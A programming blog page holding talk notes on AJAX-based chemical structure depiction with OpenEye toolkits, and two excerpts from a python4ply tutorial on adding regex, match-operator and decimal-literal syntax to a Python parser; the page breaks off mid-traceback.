Dalke Scientific Software: More science. Less time. Products


Writings from the software side of bioinformatics and chemical informatics, with a heaping of Python thrown in for good measure. Code to taste. Best served at room temperature.

EuroCUP 2008 presentation

The following is text to accompany my presentation for EuroCUP 2008. I do not have a license for OEChem on my public-facing web server machine so I cannot have a live demo for any of the code examples.

Download the presentation as PDF.

AJAX and the OpenEye Tools

My name is Andrew Dalke. I'm an independent software consultant and instructor based in Göteborg (Gothenburg), Sweden. I mostly focus on developing computational chemistry tools and helping scientists become more capable in using computers to do their research.

[page 2]

Suppose you want a web page that shows a graphical 2D depiction of a compound given its SMILES. One very traditional way to do this - the Daylight libraries have supported it for over 10 years - is with a CGI script serving images based on the GET query parameters. The HTML might look like

<html>
...
<img src="/depict.cgi?smiles=CC(=O)Oc1ccccc1C(=O)O" />
...
</html>

The web browser gets the HTML, figures out it needs an image, and makes an HTTP request to the src URL. The web server, which is usually Apache, gets the request, converts it into a CGI request, and runs the program named "depict.cgi". This program uses the CGI parameter to create the requested depiction. In real life the CGI script may in turn call another program to do the actual depiction.
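To make the request flow concrete, here is a minimal sketch of the server side, written as a WSGI application with only Python's standard library. It is not the depict.cgi from the talk. The names depict_app, call_app and render_depiction are made up for this illustration, and render_depiction is a stand-in that returns placeholder bytes where a real service would call a depiction toolkit.

```python
from urllib.parse import parse_qs


def render_depiction(smiles):
    # Hypothetical stand-in: a real service would return PNG bytes
    # produced by a depiction toolkit.
    return ("depiction of " + smiles).encode("utf-8")


def depict_app(environ, start_response):
    # Pull the "smiles" parameter out of the GET query string.
    query = parse_qs(environ.get("QUERY_STRING", ""))
    smiles = query.get("smiles", [""])[0]
    if not smiles:
        start_response("400 Bad Request", [("Content-Type", "text/plain")])
        return [b"missing smiles parameter"]
    body = render_depiction(smiles)
    # A real depiction service would send "image/png" here.
    start_response("200 OK", [("Content-Type", "application/octet-stream")])
    return [body]


def call_app(query_string):
    # Tiny harness that plays the role of the web server for one request.
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    body = b"".join(depict_app({"QUERY_STRING": query_string}, start_response))
    return captured["status"], body


status, body = call_app("smiles=CC(=O)Oc1ccccc1C(=O)O")
print(status, body)
```

The handler only sees the query parameters, which is the point of the layering: the same function could sit behind CGI, TurboGears, or any other server interface.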

[page 3]

This interface was developed about 15 years ago and is still a valid way to write web applications. There are many other ways to handle the interface between the outside world and the actual work which needs to be done. The different layers, which can include database access, session maintenance, and output templates, are now collectively called the "web application stack." Ruby on Rails is a popular "full stack" system developed over the last 4 years, and Django and TurboGears are roughly similar systems for Python. All my examples are based on TurboGears.

[page 4]

The web server implementation should not affect how the web interface works. That is, there should be no reason to change any of the URLs or get different HTML back from the server. In practice, though, a few things do change. For example, using the extension ".cgi" in the URL is a bit of a cheat. It's there because that's one way Apache can tell if a file is a data file or an executable CGI script. In use it's a "leaky abstraction" because it lets some of the internal implementation decisions leak into the public interface. This can make it harder to port to other systems.

In my case I'm using TurboGears, which by default doesn't do well with periods in the URL, so for my examples I'll remove the ".cgi" from the URL.

The TurboGears code is structured very similarly to the Apache code. An HTTP request comes in, TurboGears converts that into a Python function call (instead of CGI request), and calls the function that handles the request. In this case that Python function doesn't know anything about chemistry. It leaves the details up to OpenEye's ogham toolkit for 2D structure depiction.

The biggest architectural difference is that everything is done through Python and Python libraries, and everything occurs in the same process space. I don't have to start up a new program for every request.

By the way, if you're curious about how I get ogham to generate a PNG output as a string, rather than as a GIF or other non-PNG file, see my earlier essay on "OE8BitImage to PNG." It was a fun bit of reverse engineering.

[page 5]

My web page example had a single hard-coded SMILES. What if I want something more interactive, where the user can input a SMILES and see the depiction image? I'll do this with an HTML form, which sends the "smiles" parameter to the "/depict" service on the web server. This is the same service I used for the HTML image.

[page 6]

Viewing just the image is very static. The image just sits there. I would rather see the structure I submitted and also have a form for submitting a new SMILES to depict. In this case I'll submit the form to a new "/show_depict" handler, which will respond with HTML that includes an img element for the requested SMILES and includes the form for doing a new "/show_depict" depiction. Note that this requires two requests to the server: the first to "/show_depict" for the HTML and the second to "/depict" to get the depiction image.

[page 7]

By using HTML forms I've now advanced to HTML 2.0, which was formally specified in 1995. At the end of that year, Netscape Navigator introduced Javascript, which people originally used for doing form input validation. People make mistakes, and while hopefully the server is doing a layer of sanity checking, it still may take some time for the sent form to go to the server and come back again. A Javascript program can make things feel more interactive by sitting inside of the web page where it can access HTML and form elements and handle events like "form submitted."

The only difference in the HTML is the img src URL, so instead of submitting the form each time to the server, I'm going to listen for the "submit" event using Javascript. When that occurs I'll reach into the document (the formal term is the "document object model", or "DOM") and change the URL, then tell the browser that there's no need to do the actual submission.

[page 8]

Here's what the HTML form looks like. I've added an "onsubmit" handler to the form, which is a bit of Javascript to call on form submission, and I've given identifiers to the SMILES input text box and to the depiction image, to make them easier to find later on.

[pages 9 and 10]

Here's the HTML fully fleshed out. The "onsubmit" handler calls the Javascript function "update_image()". This gets the text from the "smiles" field and finds the "depiction" image element. It then sets the depiction's "src" field to a URL based on the SMILES. I use the "escape" function because the user input may contain characters that have special meaning in URLs, like "/". The "return false" tells the browser that it does not need to send the form to the server.
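The same escaping concern shows up on any client that builds the depiction URL. As a rough illustration in Python (not the Javascript from the slides), the sketch below uses the standard library's urlencode to build the query string. The depiction_url helper and the "/depict" default are assumptions made for this example.

```python
from urllib.parse import parse_qs, urlencode, urlparse


def depiction_url(smiles, base="/depict"):
    # urlencode percent-escapes characters such as "#", "+", "=" and "/",
    # all of which can occur in a SMILES string.
    return base + "?" + urlencode({"smiles": smiles})


url = depiction_url("C#N")
print(url)

# Without escaping, "#" starts the URL fragment and the SMILES is cut short.
unescaped_query = urlparse("/depict?smiles=C#N").query

# With escaping, a charged SMILES survives the round trip intact.
round_trip = parse_qs(urlparse(depiction_url("[NH4+]")).query)["smiles"][0]
```

One thing to watch for on the Javascript side: escape() leaves "+" unescaped, and many servers decode a "+" in a query string as a space, so a charged SMILES may arrive damaged. encodeURIComponent is the usual alternative.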

This is out-dated!

[page 11]

I could go into more details but I won't, because what you see here is out-dated. This was state of the art about 6-8 years ago, but in practice there are problems with it. For example, it's hard to make components with it, like the ability to have multiple depictors in the same page. It mixes HTML and Javascript in the same file, which is harder to develop with and it confuses text editors. There's also the unfortunate problem that browsers have bugs. IE is known for its memory leaks in the face of circular references. There are workarounds, but learning them all takes time.

Thankfully there are better ways to develop Javascript tools. Most of the best practices and workarounds are available through Javascript libraries like jQuery, YUI, and MochiKit.

[page 12]

Here's the same form rewritten for use with jQuery. You see at the top I include the jQuery code, which is available as a single file from this URL. I then have a script block that sets up the interactive page. What this is saying is:

  When the document is fully loaded (that is, all the HTML has been parsed),
    Find the elements with tag name "form" (there is only one)
      When its submit button is pressed ...
        call this anonymous function.  ("anonymous" means "does not have a name")

Javascript allows "$" in a variable name. jQuery defines a special function named just "$" which combines a selection language and a wrapper object. "$(document)" means "select the document object from Javascript and wrap it inside of a jQuery context." That context is what lets you do ".ready()" and ".submit()". If the function call gets a string then jQuery uses a CSS-style selector language (similar in spirit to XPath) to select fields from the DOM. '$("form")' means "select all HTML elements named 'form'" while '$("#smiles")' means "select all HTML elements where the 'id' is 'smiles'".

The anonymous submit function does the following:

Select the "#smiles" element (that's the element with id 'smiles').
Get its "val" property, which in this case is the input text for that field.
Escape it to make a depiction URL.
Assign the URL to the "src" attribute of the "#depiction" element (the element
   with id 'depiction')
Finally, "return false" to tell the browser it does not need to send the form.

This code is a bit longer than the preceding Javascript example, but that's only going to be the case for very simple examples like this. Otherwise the jQuery code is usually shorter, more succinct, and easier to understand, once you understand how jQuery works. It also separates the Javascript code completely from the HTML.

[pages 13 and 14]

I can make the interface still more interactive. The OpenEye depiction code is quite fast. Instead of waiting for the form submission I could update the image src URL after every keystroke. Sadly, this turns out to be complicated to do correctly. Javascript supports "keydown", "keyup", and "keypress" events, which sound like the right things. The problem is, the text isn't updated until after the event succeeds. Why? Because it's used for key input filtering. The Javascript handler can "return false" to tell the browser to ignore a given key.

It's also complicated because things like "control-v" for "paste", and "home" for "go to start of the input", and the backspace key are also handled as key input, but aren't simple changes to the text field. The easiest solution I found was to wait until after the event happens, let the browser do whatever is appropriate to the key input, and only then examine the contents of the text field.

I'm going to use MochiKit for this, which is another Javascript library. MochiKit is great for Python programmers like me because it makes Javascript feel more like Python. It adds mostly core-level libraries to simplify event handling, iteration, and DOM manipulation. There is some functionality overlap with jQuery, but they do work pretty well together. The only thing to watch out for is that by default both want to define the '$' function.

Don't be put off by seeing that MochiKit's last release was in 2006. It's a stable, well-developed and mature library.

I import the MochiKit functionality with the usual <script> tag. Once the document is loaded and ready, I add a "keydown" handler on the "#smiles" element. This anonymous function will be called after every key press. But all the function does is ask the browser to call another function, "update_image", 0 seconds later. The browser adds it to the wait queue of function calls to be done at some time in the future. These calls are only done when no event handler is being processed. (The Javascript code in a page is single-threaded by design.) The result is that "update_image" will be called most likely as soon as the keydown event is processed.

The "update_image" function should be very familiar. It's the code that extracts the text value from the "#smiles" element, constructs the image URL, and assigns it to the "#depiction" element's "src" field.

One of the many nice things about the OpenEye toolkit is it will handle partial SMILES strings as input. OEParseSmiles parses as much as it can understand and returns True on success. If it returns False then the SMILES was not correct or was incomplete, but the molecule object will contain as much of the molecule as it was able to parse. It's a valid molecule object, and the depiction code has no problems laying it out.

JSON request

[page 15]

The previous example depicts the molecule while I type in the SMILES string. I'm going to change it a bit and also display the IUPAC name for the SMILES string using OpenEye's naming code on the server. Again, this will be a highly interactive page where I can see the name while I am typing the SMILES.

This is a bit more complex than the image example because I need data from the server. I want to know if the SMILES string is a valid SMILES string (it could be an incomplete input) and the IUPAC name for the molecule, or at least as much of the input as OEParseSmiles could understand.

I'll do this by creating a new web service called "smi2name." It's a normal GET request that takes a "smiles" as its only input parameter and returns a "JSON" document. JSON, short for "JavaScript Object Notation", is a data format which is very fast for web browsers to handle as they already have code for dealing with Javascript code. This is a common technique in modern Javascript code and most libraries, including MochiKit, have code to make it easy to do.

At the bottom you can see an example JSON document that would be returned by this service. It's a Javascript dictionary containing a "status" field, which is either "valid" or "invalid", and a "name" field, containing OpenEye's IUPAC name assignment.
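For readers without the slide in front of them, here is a minimal sketch of how a document of that shape could be built in Python with the standard json module. The smi2name_response helper is hypothetical and the name value is a placeholder. It is not output from OpenEye's naming code.

```python
import json


def smi2name_response(parsed_ok, name):
    # Build a JSON document with the two fields described above.
    status = "valid" if parsed_ok else "invalid"
    return json.dumps({"status": status, "name": name})


# Placeholder name; a real service would get this from the naming toolkit.
doc = smi2name_response(False, "placeholder-name")
print(doc)

# The browser side does the equivalent of this to get a dictionary back.
decoded = json.loads(doc)
```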

[page 16]

My one change to the HTML is to include a "Name: " field below the image, which is where the IUPAC name will go. That's a label and an empty text span element, with the id "compound_name."

[page 17]

Here's the modified Javascript code for that case. You'll recognize the first half of the code. The "loadJSONDoc" is the MochiKit call to simplify making a JSON request. I give it the URL to call and an optional dictionary of query arguments. Requests like this are asynchronous, meaning that the Javascript has asked the browser to fetch the URL but it's not going to get the result right away.

Instead, MochiKit returns what's called a "Deferred" object. I can configure it to call "show_compound_name" once the JSON document has been fetched and parsed into a normal Javascript data structure.

The callback function is named "show_compound_name". The JSON document contains a Javascript dictionary, so I can figure out if the input SMILES was valid or not and color the result black if it was valid or red if it was invalid.

The last line of real code shows jQuery's function call chaining. The '$("#compound_name")' selects the element with id "compound_name", which is the text span. The ".text(smi2name_result.name)" gets the "name" from the results dictionary and assigns it to the text content of the span element. This is what displays the name to the user.

The result of calling ".text(...)" is the same query object. I can use it to change other properties of my selection. So I'll change the CSS "color" property so it shows the red or black status value.

[page 18]

In case you're curious, here's most of the code on the server to implement "smi2name" using TurboGears. I left out only the scaffolding code that TurboGears writes for you and the lines to import the right OpenEye libraries into the Python module.

Demo

[page 19]

Last summer I spent a month learning how to use modern Javascript tools. My experimental test case was a 2D structure viewer widget. I developed a demo for it, and recorded a screencast.

[page 20]

The hardest part to get working was the mouseover support for the depiction. I ended up making extensive use of CSS, which tells the web page how to lay out a page. I used 4 layers on top of each other to get things working. The bottom layer is the Ogham depiction, and is the PNG image you've seen elsewhere. This is generated on the web server but only needs to change if the SMILES or the image size changes.

On top of that, the third layer is a semi-transparent image showing which atoms have been selected, either from mouse selection or from the SMARTS/atom index selection. This must occur on the server because that's what understands SMARTS, and must be recreated if the size or SMILES changes.

The top two layers are for mouseover support. The top layer is a transparent image containing only an image map. Each hotspot on the map is a circle, centered on the center of an atom. I use this to tell if the mouse is over an atom. If the image size changes then I make a JSON request to the server to get the new atom locations and scaled atom radius.

The second layer contains a small PNG with a circle and a transparent background. There's a bit of Javascript which connects the "mouseover"/"mouseout" events from the first layer to move the circle around in the second layer. The result is a fast, client-side highlighting of the atom the mouse is over.

The four layers are aligned so to the user it looks like one coherent view, despite the implementation complexity.



python4ply tutorial, part 3

The following is an excerpt from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Creating regular expression pattern objects

Regular expressions are fun. The first contact I had with them was through DOS globbing, where "*.*" matched all files with an extension. Then I started using Unix, and started using Archie, which supported regular expressions. Hmm, that was in 1990. I read the documentation for regexps but I didn't understand them. Instead I mentally translated the glob "?" to "." and the glob "*" to ".*".

Luckily for me I was in college and I took a theory of automata course. I loved that course. It taught me a lot about how to think about computers as what they are - glorified state machines.

Other programmers also really like regular expressions, and languages like Perl, Ruby, and Javascript consider them so important that they are given syntax-level support. Python is not one of those languages, and someone coming from Ruby, where you can do

# lines.rb
File.open("python_yacc.py").each do |line|
  if line =~ /def (\w+)/
    puts "#{$1}\n"
  end  
end
will probably find the corresponding Python both tedious and (because of the separation between the pattern definition and use) harder to read:
# lines.py
import re

pattern = re.compile(r"def (\w+)")

for line in open("python_yacc.py"):
    m = pattern.match(line)
    if m is not None:
        print m.group(1)
This code is generally considered the best practice for Python. It could be made a bit shorter by using re.match instead of the precompiled pattern, but at the cost of some performance.
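For reference, here is a sketch of that shorter form. It's written for Python 3, unlike the Python 2 code in this tutorial, and the sample lines are made up. It also shows a detail worth keeping in mind when comparing with the Ruby version: "match" only matches at the start of the line, while "search" scans the whole line.

```python
import re

# Made-up sample lines standing in for the contents of a source file.
lines = ["def spam(x):\n", "    def nested(y):\n", "x = 1\n"]

# Shorter form: no precompiled pattern, re.match looks it up on each call.
matched = []
for line in lines:
    m = re.match(r"def (\w+)", line)
    if m is not None:
        matched.append(m.group(1))

# re.search finds the pattern anywhere in the line, including indented defs.
searched = []
for line in lines:
    m = re.search(r"def (\w+)", line)
    if m is not None:
        searched.append(m.group(1))

print(matched, searched)
```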

I'll give Perl5 regular expressions (as implemented by the 're' module) first-class syntax support for creating patterns. That will shorten the code by getting rid of the "import re" and the "re.compile()" call. Here's how I want the pattern creation to look

pattern = m/def (\w+)/
This new syntax is vaguely modelled after Perl's. It must start with an "m/" and end with a "/" on the same line. Note that my new syntax might break existing code because
m=12
a=3
i=2
print m/a/i
is already valid.
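The clash can be checked directly. This small sketch (Python 3, standard library only) shows the two readings of the same text: ordinary Python sees two divisions, while the PATTERN token regex used in this section's t_PATTERN rule consumes the whole thing as one token.

```python
import re

# The PATTERN token regex from this section's t_PATTERN rule.
pattern_token = re.compile(r"m/[^/]*/[a-z]*")

m, a, i = 12, 3, 2
source_text = "m/a/i"

# Standard Python reads the text as two divisions.
as_division = m / a / i

# The new lexer rule would instead swallow it as a single PATTERN token.
as_token = pattern_token.match(source_text).group(0)

print(as_division, as_token)
```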

The new token definition goes before the t_NAME definition, to prevent the NAME from matching first. This token returns a 2-tuple of the regular expression pattern as a string, and the flags to pass to re.compile. I need to pass it back as basic types and not a pattern object because the bytecode generation only understands the basic Python types.

import re
_re_flags = {
    "i": re.IGNORECASE,
    "l": re.LOCALE,
    "m": re.MULTILINE,
    "s": re.DOTALL,
    #"x": re.VERBOSE, # not useful in this context
    "u": re.UNICODE,
}
def t_PATTERN(t):
    r"m/[^/]*/[a-z]*"
    m, pattern, opts = t.value.split("/")
    
    flags = 0
    for c in opts:
        flag = _re_flags.get(c, None)
        if flag is None:
            # I could pin this down to the specific character position
            raise_syntax_error(
                "unsupported pattern modifier %r" % (c,), t)
        flags |= flag
    # test compile to make sure that it's a valid pattern
    try:
        re.compile(pattern, flags)
    except re.error, err:
        # Sadly, re.error doesn't include the error position
        raise_syntax_error(err.message, t)
    t.value = (pattern, flags)
    return t


# This goes after the strings otherwise r"" is seen as the NAME("r")
def t_NAME(t):
    r"[a-zA-Z_][a-zA-Z0-9_]*"
    t.type = RESERVED.get(t.value, "NAME")
    return t
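To try the token-splitting logic outside of PLY, here is a standalone sketch for Python 3. The split_pattern_token name is made up, it raises a plain SyntaxError instead of calling raise_syntax_error, and it only carries a subset of the flag table (Python 3 rejects re.LOCALE on str patterns, so "l" is left out here).

```python
import re

# Subset of the modifier table above, chosen so it also runs on Python 3.
_re_flags = {
    "i": re.IGNORECASE,
    "m": re.MULTILINE,
    "s": re.DOTALL,
}


def split_pattern_token(text):
    # The token regex guarantees exactly two "/" characters, so this
    # always unpacks into three parts. A pattern cannot contain "/".
    prefix, pattern, opts = text.split("/")
    flags = 0
    for c in opts:
        if c not in _re_flags:
            raise SyntaxError("unsupported pattern modifier %r" % (c,))
        flags |= _re_flags[c]
    # Test compile so a bad pattern is reported at parse time.
    try:
        re.compile(pattern, flags)
    except re.error as err:
        raise SyntaxError(str(err))
    return pattern, flags


print(split_pattern_token(r"m/def (\w+)/i"))
```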

This PATTERN will be a new "atom" at the grammar level, which will correspond to a call to re.compile("pattern", options).

def p_atom_13(p):
    'atom : PATTERN'
    pattern, flags = p[1]
    p[0] = ast.CallFunc(ast.Name("_$re_compile"), [ast.Const(pattern),
                                                   ast.Const(flags)])
    locate(p[0], p.lineno(1))

See how I'm using the impossible variable name '_$re_compile'? That's going to be "re.compile" and I'll use the same trick I did with the DECIMAL support and insert the AST corresponding to

from re import compile as _$re_compile
at the start of the module definition,
def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("re", [("compile", "_$re_compile")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
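The 'compiler' module used here is Python 2 only. As a rough analogue, this sketch does the same kind of import injection with Python 3's "ast" module. It is an illustration of the idea, not python4ply code: it uses the ordinary name "_re_compile" rather than the "$" name, and it does not handle a module docstring the way extract_docstring does.

```python
import ast

# A module body that calls a name it never imports itself.
source = r'''
pattern = _re_compile(r"def (\w+)", 0)
name = pattern.match("def spam(x):").group(1)
'''

tree = ast.parse(source)

# Insert the AST for "from re import compile as _re_compile" at the top.
injected = ast.ImportFrom(
    module="re",
    names=[ast.alias(name="compile", asname="_re_compile")],
    level=0,
)
tree.body.insert(0, injected)
ast.fix_missing_locations(tree)

# Compile and run the modified tree.
namespace = {}
exec(compile(tree, "<sketch>", "exec"), namespace)
print(namespace["name"])
```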

I'll test this with a simple program

# pattern_test.py
data = "name: Andrew Dalke   country:  Kingdom of Sweden "
pattern = m/Name: *(\w.*?) *Country: *(\w.*?) *$/i
m = pattern.match(data)
if m:
    print repr(m.group(1)), "lives in", repr(m.group(2))
else:
    print "unknown"
% python compile.py -e pattern_test.py 
'Andrew Dalke' lives in 'Kingdom of Sweden'
%
and to see that it generates byte code
% python compile.py  pattern_test.py
Compiling 'pattern_test.py'
% rm pattern_test.py
% python -c 'import pattern_test'
'Andrew Dalke' lives in 'Kingdom of Sweden'
%

Adding a match operator

These changes make it easier to define a pattern, but not to use it. As another example of (fake?) Perl envy, I'm going to support its "=~" match syntax so that the following is valid:

# count_atoms.py
import time

# Count the number of atoms in a PDB file
# Lines to match look like:
# ATOM   6312  CB  ALA 3 235      24.681  54.463 137.827  1.00 51.30
# HETATM 6333  CA  MYR 4   1       6.722  54.417  88.584  1.00 50.79
count = 0
t1 = time.time()
for line in open("nucleosome.pdb"):
  if line =~ m/(ATOM  |HETATM)/:
      count += 1
print count, "atoms in", time.time()-t1, "seconds"

This turned out to be very simple. I need a new token for "=~". Most of the simple tokens are defined in "python_tokens.py". I added "EQUALMATCH" in the list of tokens in the place shown here

 ...
PERCENTEQUAL %=
AMPEREQUAL &=
CIRCUMFLEXEQUAL ^=
EQUALMATCH =~

COLON :
COMMA ,
 ...

Note that this will break legal existing code, like

>>> a=~2
>>> a
-3
>>> 
The lexer doesn't need anything else because I've already defined a PATTERN token.
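To see why "a=~2" is affected, it helps to look at how standard Python splits it up. This sketch uses Python 3's "tokenize" module, which is not part of python4ply, and the operator_tokens helper is made up. It shows "=" and "~" arriving as two separate operator tokens, which is exactly the pair the new EQUALMATCH token would merge.

```python
import io
import tokenize


def operator_tokens(source):
    # Return only the operator tokens from a line of Python source.
    readline = io.StringIO(source).readline
    return [tok.string
            for tok in tokenize.generate_tokens(readline)
            if tok.type == tokenize.OP]


ops = operator_tokens("a=~2\n")
print(ops)

# In standard Python this is assignment of the bitwise inverse of 2.
a=~2
```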

I need to decide the precedence level of =~. Is it as strong as "**" or as weak as "or", or some place in between? I decided to make it as weak as "or", which is defined by the "test" definition. Here's my new "p_test_4" function:

def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'), [p[1]], None, None),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

I got the AST definition by looking at

>>> from compiler import parse
>>> parse("pat.search(line) is not None")
Module(None, Stmt([Discard(Compare(CallFunc(Getattr(Name('pat'), 'search'),
[Name('line')], None, None), [('is not', Name('None'))]))]))
>>> 

And that's it! Well, I could add an optimization in this case and move the ".search" outside the loop, but that's an exercise left for the student.
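Written out by hand, the code that the "=~" rule stands for looks roughly like this Python 3 sketch. The two record lines are taken from the comments in count_atoms.py, the REMARK line is made up, and the name "_pat" stands in for the generated symbol. It also hoists the ".search" lookup out of the loop, which is one way to read the optimization mentioned above.

```python
import re

# Stand-in for the gensym'ed pattern variable.
_pat = re.compile(r"(ATOM  |HETATM)")

lines = [
    "ATOM   6312  CB  ALA 3 235      24.681  54.463 137.827  1.00 51.30",
    "HETATM 6333  CA  MYR 4   1       6.722  54.417  88.584  1.00 50.79",
    "REMARK this line is made up and is not an atom record",
]

# Look up the bound method once instead of on every iteration.
search = _pat.search

count = 0
for line in lines:
    # Equivalent of: if line =~ m/(ATOM  |HETATM)/:
    if search(line) is not None:
        count += 1

print(count, "atoms")
```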

Now I'll put a toe into evil, just to see how cold it is. I'm going to add support for

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        print repr($1)
That is, if the =~ matches then $1, $2, ... will match group 1, 2. Oh, and while I'm at it, if there's a named group then $name will retrieve it. And '$' will mean to get the match object itself.

To make it work I need some way to do assignment in the expression. Python doesn't really support that except through a hack I don't want to use, so I'll use another hack and change the bytecode generation stage.

I created a new AST node called "AssignExpr" which is like an "Assign" node except that it can be used in an expression. The compiler module doesn't know about it and it's hard to change the code through subclassing, so I patch the compiler and its bytecode generation code so it understands the new node type. These changes are in "compiler_patches.py" and the patches are done when the module is imported. Take a look at the module if you want to see what it does.

It doesn't escape my notice that with AssignExpr there's only a handful of lines needed to support assignment in an expression, like

if line = readline():
    print repr(line)
Before you do that yourself, read the Python FAQ for why Python doesn't support this.
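For comparison, Python 3.8 and later include an assignment expression operator, ":=", deliberately spelled differently from "=". This is standard Python and has nothing to do with python4ply's AssignExpr node. The sketch below reads from an in-memory stream with made-up contents.

```python
import io

# Made-up input standing in for a file.
stream = io.StringIO("first\nsecond\n")

seen = []
# ":=" assigns and also yields the value, so the loop stops when
# readline() returns the empty string at end of input.
while (line := stream.readline()):
    seen.append(line.rstrip("\n"))

print(seen)
```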

To support the new pattern match syntax I need to make two changes to python_yacc.py. The first is to import the monkeypatch module:

import compiler_patches
then make the changes to the p_test_4 function to save the match object to the variable "$".
def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.AssignExpr([ast.AssName("$", "OP_ASSIGN")],
                       ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'),
                                    [p[1]], None, None)),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

Does it work? Try this program, which is based on the Ruby code I started with at the start of this tutorial section, oh so long ago.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        # I don't yet have syntax support to get to the special '$'
        # variable so I have to get it from the globals dictionary.
        print repr(globals()["$"].group(1))
% python compile.py -e get_function_names.py
'gensym'
'raise_syntax_error'
'locate'
'bounds'
'text_bounds'
'extract_docstring'
'__init__'
'__init__'
'add_arg'
'add_star_arg'
'p_file_input_1'
'p_file_input_2'
'p_file_input_star_1'
'p_file_input_star_2'
'p_file_input_star_3'
    ...

Sweet!

With a bit more work (described in detail in the tutorial), I changed the parser to allow this Perl/Python fusion syntax.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (?P<name>\w+) *(?P<args>\(.*\)) *:/:
        print repr($1), repr($args)
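In plain Python the "$1" and "$args" lookups correspond to calls on the match object. Here is a Python 3 sketch with a made-up input line. It shows the equivalent calls, not what the modified parser actually generates.

```python
import re

pattern = re.compile(r"def (?P<name>\w+) *(?P<args>\(.*\)) *:")

# Made-up line in the style of python_yacc.py.
line = "    def add_arg(self, arg):"

m = pattern.search(line)
first_group = m.group(1)       # what $1 refers to
args_group = m.group("args")   # what $args refers to

print(repr(first_group), repr(args_group))
```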



python4ply tutorial, part 2

The following is an excerpt from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Syntax support for decimal numbers

How about something more complicated? Python's "decimal" module provides a decimal floating point numeric type (that is, one using base 10), which is especially useful for those dealing with money. Here's an obvious limitation of doing base 10 calculations in base 2. I stole it from the decimal documentation.

>>> 1.0 % 0.1
0.09999999999999995
>>> import decimal
>>> d = decimal.Decimal("1.0")
>>> d
Decimal("1.0")
>>> d / decimal.Decimal("0.1")
Decimal("10")
>>> 
The normal way to create a decimal number is to "import decimal" then use "decimal.Decimal". I'm going to add grammar-level support so that "0d12.3" is the same as decimal.Decimal("12.3"). There's a few complications so I'll walk you through how to do this.
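As a point of comparison for the rest of this section, here is what the two remainder calculations look like when written with today's syntax (Python 3). The last line is the object that "0d12.3" is meant to stand for.

```python
from decimal import Decimal

# Binary floating point: 0.1 cannot be represented exactly,
# so the remainder is not zero.
float_remainder = 1.0 % 0.1

# Decimal arithmetic gives the remainder you would expect on paper.
decimal_remainder = Decimal("1.0") % Decimal("0.1")

# What the proposed literal 0d12.3 should be shorthand for.
literal_equivalent = Decimal("12.3")

print(float_remainder, decimal_remainder, literal_equivalent)
```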

I need a new DECIMAL token type that matches "0[dD][0-9]+(\.[0-9]+)?". This allows "0d1.23" and "0D1" and "0d0.89" but not "0d.2" nor "0d6." Feel free to change that if you want. Bear in mind possible ambiguities; does "0d1.x" mean the valid "Decimal('1').x" or the syntax error "Decimal('1.') x"? What about "0d1..sqrt()"?
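The regular expression can be tried on those examples directly. This Python 3 sketch uses only the "re" module, and the is_decimal_literal helper is made up. "fullmatch" checks whether the whole text is a literal, while "match" shows how much a lexer using this pattern would consume from the front of the input.

```python
import re

DECIMAL_RE = re.compile(r"0[dD][0-9]+(\.[0-9]+)?")


def is_decimal_literal(text):
    # True only if the entire text is one DECIMAL literal.
    return DECIMAL_RE.fullmatch(text) is not None


accepted = [s for s in ("0d1.23", "0D1", "0d0.89") if is_decimal_literal(s)]
rejected = [s for s in ("0d.2", "0d6.") if not is_decimal_literal(s)]

# For the ambiguous inputs this pattern consumes only "0d1", leaving
# ".x" and "..sqrt()" for the following tokens.
prefix_attr = DECIMAL_RE.match("0d1.x").group(0)
prefix_call = DECIMAL_RE.match("0d1..sqrt()").group(0)

print(accepted, rejected, prefix_attr, prefix_call)
```

So with this particular pattern "0d1.x" reads as an attribute lookup on the decimal, because the "." is only consumed when digits follow it.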

Designing a new programming language really means having to pay attention to nuances like this.

The DECIMAL rule is simple, in part because limitations on what can be saved in the byte code mean the creation of the decimal object must be deferred until later. Just like with the t_BIN_NUMBER rule, this new t_DECIMAL rule must go before t_OCT_NUMBER so there's no confusion.

def t_DECIMAL(t):
    r"0[dD][0-9]+(\.[0-9]+)?"
    t.value = t.value[2:]
    return t

def t_OCT_NUMBER(t):
    r"0[0-7]*[lL]?"
    t.type = "NUMBER"
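As an aside on why the order matters: PLY tries function-based token rules in the order they are defined, much like alternatives in one big regular expression. This Python 3 sketch imitates that with plain "re" alternation. The first_token helper is made up, and the inner group of the decimal pattern is written as non-capturing to keep the group bookkeeping simple.

```python
import re

OCT = r"(?P<OCT_NUMBER>0[0-7]*[lL]?)"
DEC = r"(?P<DECIMAL>0[dD][0-9]+(?:\.[0-9]+)?)"


def first_token(rules, text):
    # Alternatives are tried left to right, like rules in definition order.
    m = re.compile("|".join(rules)).match(text)
    return m.lastgroup, m.group(0)


# Octal rule first: it grabs the leading "0" and stops there.
wrong_order = first_token([OCT, DEC], "0d1.0")

# Decimal rule first: the whole literal is matched.
right_order = first_token([DEC, OCT], "0d1.0")

print(wrong_order, right_order)
```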

If you save this and try it out on the following program

# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
you'll see
% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
